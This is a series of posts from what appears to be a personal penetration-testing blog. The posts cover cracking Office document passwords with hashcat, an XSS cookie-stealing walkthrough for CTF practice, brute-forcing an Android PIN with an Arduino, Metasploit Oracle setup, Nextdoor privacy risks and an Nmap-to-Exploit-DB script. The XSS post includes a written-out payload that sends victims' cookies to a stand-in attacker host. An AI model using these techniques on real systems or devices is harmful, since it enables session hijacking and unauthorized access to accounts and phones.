Wednesday, February 11, 2015

Password cracking a Word document or an Excel file has
become much easier. Previously you had
to rely on a flaw in the document, some sketchy software or an even sketchier
website. Since October 2014 OclHashcat now supports cracking the documents
password. The process is simple but not
as straight forward as a novice might want. You need a couple of things a
graphics card capable of cracking using GPU’s, such as an NVidia card with cuda
support, OclHashcat version 1.31 or greater, python, and a password protected
document.

I’m writing this for Windows because, let’s face it if you
lost a password for Word, Excel or Powerpoint you probably have Windows. First go to hashcat.net
grab the correct OclHashcat version for your GPU either AMD or NVidia. Download it and unzip it, you may need 7zip
if you can’t unzip the file. Next, you need python, get that here python.org.
(I’m not going to say use Python 2.7 or Python3 just grab whatever, I just use
2.7.) Grab the installer, and install it. You also need a python script called
office2john and you can get that here office2john.
Long story short john the ripper another password cracking suite is also
capable of doing this, but I prefer OclHashcat.

Now, we have everything we need to recover that password
right? Nope, we need one more thing some dictionaries to use with OclHashcat.
Get those from SkullSecurity. You can move on to
rule attacks or brute force if the dictionaries fail. One of my first go to
lists is the rockyou list start there.

Let’s get cracking, open up a command prompt and navigate to
the directory with the office2john.py file and the password protected
file. Enter: python office2john.py FILENAME, filename
being the protected document. After a second you will see the output like
below:

This is the hash of the password that protects the document,
the important part here is highlighted as we need to tell OclHashcat what type
of hash this is. This one is an Office 2010 document. From the command prompt navigate to where you
have OclHashcat actually CudaHashcat for me. Entering --help after the
cudahashcat32.exe or cudahashcat64.exe will show you the hash type numbers and
you pick the one that matches your office version you see in the extracted hash
above.

Since the document is Office 2010 I need hash type 9500.
Here is my command

--username, tells hashcat to ignore the username
in this case the username is “Book1.xlsx”

The next part is the hash followed by the dictionary.
Running this will result in the output similar to below.

In the image the hash was cracked in 4 seconds with the
password being “Password”. If that
doesn’t work try another dictionary use rules or try to brute force. Keep in
mind that a brute force can take a LONG TIME.

Even brute forcing a 6 character password with uppercase,
lowercase and numbers can take more than a year. Obviously, the better or more
GPU’s you have the faster it will be.

Sunday, August 3, 2014

During Capture the Flag (CTF) events or if you are learning
to pentest, sometimes you may be posed with the challenge to login to a website
without having credentials. This type of
attack requires a few things generally, a website or part of one that is
protected, victim, and cross site scripting.
I have also included vulnerable web server code at the bottom of the
post, so you can try it yourself.

The attacker finds a webserver vulnerable to XSS

The user logs into the webserver

The attacker sends message with a malicious link designed to send the cookie to the attacker

The link is opened and the user unknowingly sends their cookie to the attacker

The attacker is happy as he logs into the webserver

In the example we use reflected XSS, this could be done with
stored also the steps would remain the same with the exception of needing to
send the message to the user.

2. A user logs into the site to preform normal business, and
given a session id.

Valid user login

3. The attacker sends a malicious link in an email or some other means with this type of link which may vary or need to be encoded. http://192.168.1.190/login.html?user=test<script>var+i+=+new+Image();i.src="http://attackerip/gimmie.html?cookie="+document.cookie</script>&pass=test

Email tricking user to click the malicious link

4. When the link is opened it visits the page and shows an invalid user to the victim. However, in the background it sends a request to the attacker’s site with their cookie included. Where the attacker has just a simple python web server listening. The incoming request shows the cookie: sessionid and the value of "super_secret_session".

Incoming session information

5. The
attacker then uses their preferred method to get the cookie into their browser
such as a plugin like web developers toolbar for Firefox and adds the cookie.

The attacker then simply visits the site and is
automatically logged in.

Below you will find the code for the vulnerable web server. Only requirement is python.

Wednesday, January 15, 2014

Sticking with the theme this week, I have been bored and haven’t
been able to sleep well. I decided to try my hand at brute forcing the PIN on
my Samsung Galaxy S3. Annoyingly enough
the Android operating system thought people would do this and after 5 failed
attempts you have to wait 30 seconds. Luckily, that doesn't change so
automating will be easy. I have seen Hak5’s rubber ducky do this attack as it
simply emulates a keyboard. So I decided to try it with my Arduino, and it
works just fine. If you went from 0000 -
9999 that would take roughly 16 hours, the odds are you would get it before
then.

I also tried to play with other authentication types on my
phone. The most interesting was the pattern type which now forces you to create
a backup PIN. If this is set and you can’t get the pattern you can brute force
the backup PIN all day and it doesn't have the 30 second delay. After 5 failed
swipe attempts you get the option to enter your backup PIN. See the image
below. That makes for much faster brute forcing.

The Arduino Sketch below first tries the top 20 PIN’s and
then starts its brute force cycle. Yes, it will repeat those 20 eventually but we
will try those first, just in case.

For this attack to
work you will need an Arduino Leonardo, or an Arduino that can act as a HID (Human
Interface Device), an USB OTG (on-the-go) cable and a target device. I always
set my HID sketches to work with a switch as I do not want to race the clock
trying to upload a new sketch.

In all seriousness this would be a last resort type of thing
for me, it’s going to take a long time. I would try to narrow it down somehow,
like eliminate the 0 range such as 0000-0999. Do most people start with a zero
maybe not?

Finally, the backup PIN brute force in my opinion is a real issue;
you could brute force that fairly quickly.

Tuesday, January 14, 2014

In my quest to continue to learn more about python I decided
to try my hand at making a GUI application. I then thought why not a simple SMTP tool. Why? You ask, honestly some nights are long and boring. I also wanted to write
something cross platform so I chose wxPython. This
was nothing more than a see if I can do it type of exercise. It was an experience, and lining things up wasn't fun. The other thing I wanted to do was compile it to an executable which I used PyInstaller. Shockingly because of all the added items with a GUI, the final binary turned out to be 7.5MB that's huge.

This was still a fun little tool to build, and I learned a lot doing it.

The tool is straight forward, simply put in the relevant
information and hit OK to send. You will need an email server with open relay to
put in to the server and port information. I use Sendmail or Postfix either
work just fine. Don’t ask me how to do it, Google It

Here is an image and the code is below. I am not liable for
how you use this tool and you are only allowed to use it against targets which
you have permission.

Saturday, August 24, 2013

Getting the Oracle support in Metasploit can be a complete
pain, there are a lot of little things that some blogs have right some are
missing a step or two and some are just outdated. I couldn't find any
information that gave me the complete answers, when I finally figured it out
and tested it the setup was quite painless.When it doesn't work the image
below is the error you see and even the link shown in the error is outdated. *

It's important to point out the module I'm using in these examples is auxiliary/admin/oracle/oracle_login not the the ones in the scanner directory.

From here you need a few things
head over to the following sites and grab these files, on oracle you need to
make an account, don’t worry 10 minute mail works for that (make sure you get
the 32 or 64 bit for what your system is):

Also, I have always gotten an error on the LD_LIBRARY path
so I just ran when I ran the ruby setup so just do this again but define it like
below:

export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2

cd ruby-oci8-2.1.5/

ruby setup.rb config *** see update if this errors out.

ruby setup.rb setup

ruby setup.rb install

Make sure you restart Metasploit and give it a try, if all
works like it should have you should now be able to test Oracle with
Metasploit. You can test with 127.0.0.1 just to verify everything is working,
you don’t need to have Oracle running to verify it will work.

That's it good luck, and enjoy!

As pointed out in the comment below you may also wish to check with the auxiliary/admin/oracle/oracle_sql module, to verify full functionality. Thanks CG!

*****UPDATE*****
Some distros such as Kali 1.08 may need the Ruby dev modules installed before running the ruby setup.rb command. Simply do an apt-get install ruby-dev before you run it. Thanks to Jagar for pointing out this issue.

Tuesday, April 30, 2013

I ran across this site Nextdoor.com, it is another social media site with one difference. “Nextdoor is the private social network for you, your neighbors and your community. It's the easiest way for you and your neighbors to talk online and make all of your lives better in the real world.” The idea is that only people in your real neighborhood can join. Out of curiosity I started looking around the demo site and started to think, this sounds like a terrible idea.

However, in my opinion this starts to go wrong very fast. A quick Google of site: nextdoor.com already starts to produce some interesting results. The first and second page reports results such as the West Briar, Pointe Marin, Covie Hill and Bent Creek. Clicking these links will take you to a login page where you can get a little more information about the neighborhood, such as the city, state and an outlined map of the neighborhood.

Figure 1

Okay, so what’s the risk? First the “bad guys” already know
the city, state and the neighborhood. Another quick Google search results in
finding an invite page where you enter your address and thanks to the mini map
and some more Google it is easy to find an address within the outline.

Figure
2

The next step is an address verification page. The site
requires either a credit card for checking the billing address, a mobile number
they can call or they can send you a postcard in the mail. I won’t get into the
other worries that some of those options might cause, but it looks like they
are trying hard to protect the people using the site, but is that enough? And can it be easily circumvented?

What if someone simply gets into a valid account, (we don’t
care about how at this moment it happens every day to many sites.) could an
attacker use any of the data or information to their advantage. The demo site
shows us that there is a lot of information ripe for the picking.

The site is a standard social media site. You have maps, an
inbox, events and a neighbor’s button, the exception here is the site really wants your physical data as well and it becomes a data gatherers dream. Clicking on a
user shows some useful information, obviously it is up to the user on what to
display. With the data in figure 3 an
attacker could start looking to impersonate that person, or use the data to gain
access other accounts via password resets or challenge questions like “what is
your dog’s name, what is your oldest child’s name”

Figure
3

As we go deeper into the site we start to see more information
that could be valuable or even deadly. The personal risk you accept is huge;
one of the best things about the internet is if you’re careful someone finding
you in the real world is a little bit challenging.

Figure 4

This example on the demo site shows a user asking for a baby
sitter from 4-10 pm, and other users posting phone numbers to great baby
sitters. This of course is incredibly helpful for the person needing the
sitter. But, what does it tell the bad guys? Mom or Dad won’t be home from
4-10, the name and number of the babysitter, the kids are older most likely
between the ages 7-12. That information could be valuable to any person who
wants to use it to their advantage. Did
this home just become a possible target for a personal attack, a robbery, an
angry boyfriend of the babysitter, or that creepy person down the street that
nobody talks to?

It is your job to decide if this information is secure, and
okay for display to the public. No matter what the claims of privacy there are, assume someone you don’t want seeing this information will see it. Above all else protect your family and
yourself, and maybe just maybe actually go outside and talk to your neighbors.
Finally, another important item to consider when signing up for this type of
site is: Do they care about security? In looking at the current job posting
they are hiring a lot of developers and none of the requirements of any of
those posted are for “secure coding practices”.
Hopefully, that is asked during the interview process.

Thursday, February 28, 2013

Ever run into a test where you port scan and you just cannot
remember what those ports are or if there is any vulnerabilities connected to
them? Normally, I would just take the port do a search on Exploit-db.com. However,
I found myself doing that a lot on this last test there were lots of weird
ports. I started by writing a page
scraper for Exploit-DB, that took just a list of ports, it was a little slow. I
added functionality to search the Exploit-DB CSV file that is in Backtrack or
if you have the file just point the script at it. I quickly became annoyed with
having to take the ports from my Nmap results and put them into a text file and
then run my script. I then found out
there is an API for Exploit-DB so back to the drawing board at the end of the day
the Gather Sploits script was born.

The script simply parses an Nmap xml file grabs the host,
ports and OS and runs them through either the Exploit-DB online search or
locally if specified. There are some requirements though, you will need a
Shodan API key you can get the instructions at http://docs.shodanhq.com/. You
will also need the Shodan python libraries which you can get at https://github.com/achillean/shodan-python.
Finally, you will need the code at the end of this article and python 2.7.

If the Nmap XML has the operating system (OS) detection in
it the script will limit the port findings based on that OS along with the
exploits that are for multiple OS’s. You can specify an OS or force all
results. This script produces a lot of data, you have been warned.